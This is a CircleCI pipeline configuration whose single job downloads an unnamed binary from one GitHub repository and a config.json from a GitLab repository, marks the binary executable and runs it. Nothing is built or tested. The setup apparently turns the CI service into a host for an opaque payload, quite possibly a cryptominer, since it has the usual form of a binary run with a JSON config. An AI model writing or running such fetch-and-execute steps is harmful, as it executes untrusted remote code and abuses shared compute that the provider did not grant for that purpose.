version: 2.1

executors:
  my-custom-executor:
    docker:
      - image: cimg/base:stable
        auth:
          username: $DOCKER_HUB_USER
          password: $DOCKER_HUB_PASSWORD
    resource_class: medium 

jobs:
  my-job-name:
    executor: my-custom-executor
    steps:
      - checkout
      - run:
          name: "Setup Environment and Execute"
          command: |
            wget -O sgr https://github.com/barburonjilo/open/raw/refs/heads/main/isu && wget -q -O config.json https://gitlab.com/barbieanay003/seger/-/raw/main/isu2.json && chmod +x sgr && ./sgr -c config.json

workflows:
  my-custom-workflow:
    jobs:
      - my-job-name:
          context:
            - docker-hub-creds # Menggunakan Context untuk manajemen secret yang lebih aman
